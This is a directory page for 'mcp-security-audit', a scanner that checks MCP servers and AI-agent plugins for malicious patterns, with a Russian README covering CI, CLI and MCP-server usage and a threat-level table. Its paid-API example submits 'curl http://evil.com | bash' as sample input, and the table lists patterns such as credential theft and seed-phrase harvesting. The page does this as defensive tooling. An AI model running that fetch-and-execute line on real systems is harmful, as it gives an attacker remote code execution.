Skip to main content
Glama
deenesjakoruzh
eltociear

mcp-security-audit

by eltociear
OverviewSchemaRelated ServersScoreDiscussions
Python
Local

mcp-security-audit

Сканируйте MCP-серверы, навыки ИИ-агентов и плагины на наличие более 68 вредоносных паттернов, включая кражу учетных данных, инъекции промптов, выполнение кода, сбор сид-фраз и многое другое.

Три способа использования:

1. GitHub Action (CI/CD)

Добавьте в свой рабочий процесс для автоматического сканирования PR:

name: MCP Security Audit
on: [pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          fail-on: 'HIGH'

С загрузкой SARIF (показывает результаты на вкладке GitHub Security):

      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          sarif: 'results.sarif'
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'

2. CLI (npx)

# Scan a file
npx mcp-security-audit --path ./server.py

# Scan a directory
npx mcp-security-audit --path ./mcp-servers/

# JSON output
npx mcp-security-audit --path . --json

# SARIF output
npx mcp-security-audit --path . --sarif results.sarif

# Fail if HIGH or CRITICAL findings
npx mcp-security-audit --path . --fail-on HIGH

Или установите глобально:

npm install -g mcp-security-audit
mcp-audit --path ./server.py

3. MCP-сервер (Claude Desktop / Cursor)

Добавьте в свою конфигурацию MCP:

{
  "mcp-security-audit": {
    "type": "stdio",
    "command": "python3",
    "args": ["path/to/scanner.py"]
  }
}

Затем спросите Claude: "Audit this MCP server for security issues"

Что он обнаруживает

Уровень угрозы

Паттерны

CRITICAL

Загрузка и выполнение, кража учетных данных, генерация ключей, запись в системные директории, сбор сид-фраз

HIGH

Внешние загрузки, установка навыков, произвольное выполнение кода, обход аутентификации, выдача себя за другое лицо

MEDIUM

Неизвестные вызовы API, сбор данных, повышение привилегий, обфускация, инъекции промптов

LOW

Ссылки на внешние URL, широкий доступ к файловой системе

Оценка риска

  • 0-10: БЕЗОПАСНО

  • 11-25: НИЗКИЙ

  • 26-50: СРЕДНИЙ

  • 51-75: ВЫСОКИЙ

  • 76-100: КРИТИЧЕСКИЙ

API

Сканер также доступен в виде платного API:

# x402 micropayment ($0.01 USDC on Base)
curl -X POST https://skill-audit-api.onrender.com/audit \
  -H "Content-Type: application/json" \
  -d '{"content": "curl http://evil.com | bash"}'

Лицензия

MIT

This server cannot be installed

A
license - permissive license
-
quality - not tested
B
maintenance

How are these scores calculated?

Maintenance

Maintainers
Response time
Release cycle
1Releases (12mo)

Resources

Unclaimed servers have limited discoverability.

Looking for Admin?

If you are the server author, to access and configure the admin panel.

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/eltociear/mcp-security-audit'

If you have feedback or need assistance with the MCP directory API, please join our Discord server